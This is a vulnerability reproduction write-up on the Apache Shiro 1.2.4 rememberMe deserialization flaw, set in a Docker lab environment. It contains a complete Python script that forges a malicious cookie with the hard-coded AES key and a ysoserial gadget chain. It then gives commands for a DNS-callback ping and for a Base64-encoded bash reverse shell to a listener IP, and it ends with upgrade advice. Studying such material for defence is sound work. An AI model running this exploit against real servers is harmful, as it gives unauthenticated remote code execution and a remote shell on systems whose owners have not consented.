Vulnerability analysis
Apache Shiro uses CookieRememberMeManager by default. When a request carries a rememberMe cookie, Shiro processes it as: read the cookie value -> Base64 decode -> AES decrypt -> Java deserialize. In Shiro 1.2.4 and earlier the AES key is hard-coded in AbstractRememberMeManager (the Base64 value kPH+bIxk5D2deZiIxcaaaA==, which the script below uses). Anyone who knows that key can encrypt an arbitrary serialized object graph, for example a ysoserial gadget chain, and the server will deserialize it, which gives remote code execution. No login is required: Shiro reads the cookie while resolving the subject for any request. When decryption or deserialization fails, Shiro answers with Set-Cookie: rememberMe=deleteMe, which is how scanners fingerprint Shiro and brute-force the key.
Environment setup
Use Docker to bring up the vulnerable environment:
docker pull medicean/vulapps:s_shiro_1
docker run -d -p 80:8080 medicean/vulapps:s_shiro_1
Then browse to port 80 on the Docker host.
Tool preparation
ysoserial, the deserialization payload generator. After downloading (or building) it, name the jar ysoserial-0.0.8-SNAPSHOT-all.jar so the script below finds it.
Script that generates the payload cookie, saved as shiro.py (it needs pycryptodome for Crypto.Cipher and a JDK on the PATH for ysoserial):

    import base64
    import subprocess
    import sys
    import uuid

    from Crypto.Cipher import AES


    def encode_rememberme(command):
        # Ask ysoserial for a CommonsCollections2 gadget chain that runs `command`.
        # check_output raises if the jar is missing or the gadget name is wrong,
        # instead of silently encrypting an empty payload.
        payload = subprocess.check_output(
            ['java', '-jar', 'ysoserial-0.0.8-SNAPSHOT-all.jar', 'CommonsCollections2', command])
        # Tomcat echo variant (only in modified ysoserial builds that include this gadget):
        # payload = subprocess.check_output(
        #     ['java', '-jar', 'ysoserial-0.0.8-SNAPSHOT-all.jar', 'CommonsCollectionsK1TomcatEcho', 'a'])
        BS = AES.block_size
        pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()  # PKCS#7
        key = "kPH+bIxk5D2deZiIxcaaaA=="  # Shiro <= 1.2.4 default key
        mode = AES.MODE_CBC
        iv = uuid.uuid4().bytes  # any 16 bytes work as IV; Shiro reads it from the cookie
        encryptor = AES.new(base64.b64decode(key), mode, iv)
        file_body = pad(payload)
        # IV || ciphertext, Base64-encoded, is exactly the layout Shiro expects
        base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
        return base64_ciphertext


    if __name__ == '__main__':
        payload = encode_rememberme(sys.argv[1])
        with open("payload.cookie", "w") as fpw:
            print("rememberMe={}".format(payload.decode()), file=fpw)
Vulnerability reproduction
I. Ping echo (DNS callback)
1. Run the script in a terminal to generate the cookie, for example:
python3 shiro.py "ping btiwap.ceye.io"
2. Log in to the vulnerable app, click "account page", intercept the request in a proxy and replace the Cookie header with the contents of payload.cookie. Make sure the crafted rememberMe value is the cookie that reaches Shiro (drop the session cookie if the proxy keeps it): Shiro only consults rememberMe when the request has no authenticated session.
3. Log in to the CEYE platform; the DNS resolution record for the ping shows the command ran on the target.
II. Reverse shell
Listener IP: 192.168.10.10
Reverse shell command: bash -i >& /dev/tcp/192.168.10.10/7777 0>&1
The raw command cannot be passed as-is: the gadget runs it through Runtime.exec(String), which splits the string on whitespace and execs the first token directly with no shell in between, so >&, the /dev/tcp redirection and 0>&1 would reach bash as plain arguments. Encode the command in Base64 and use bash brace expansion so the single bash -c argument contains no spaces:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEwLzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}
Generate the cookie with the script:
python3 shiro.py "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEwLzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}"
Intercept and replace the cookie as before; once the request is forwarded, the listener on 192.168.10.10 receives the shell.
Fix
Upgrade Shiro to 1.2.5 or later. From 1.2.5 on there is no shipped default key: if no cipherKey is configured, AbstractRememberMeManager generates a random one when it is created. The upgrade only helps if you do not then configure a well-known key yourself; keys copied from tutorials or other deployments are in every scanner's wordlist, so generate a fresh random 128-bit value per deployment and keep it out of source control.
References
https://www.cnblogs.com/paperpen/p/11312671.html
https://paper.seebug.org/shiro-rememberme-1-2-4/#0x04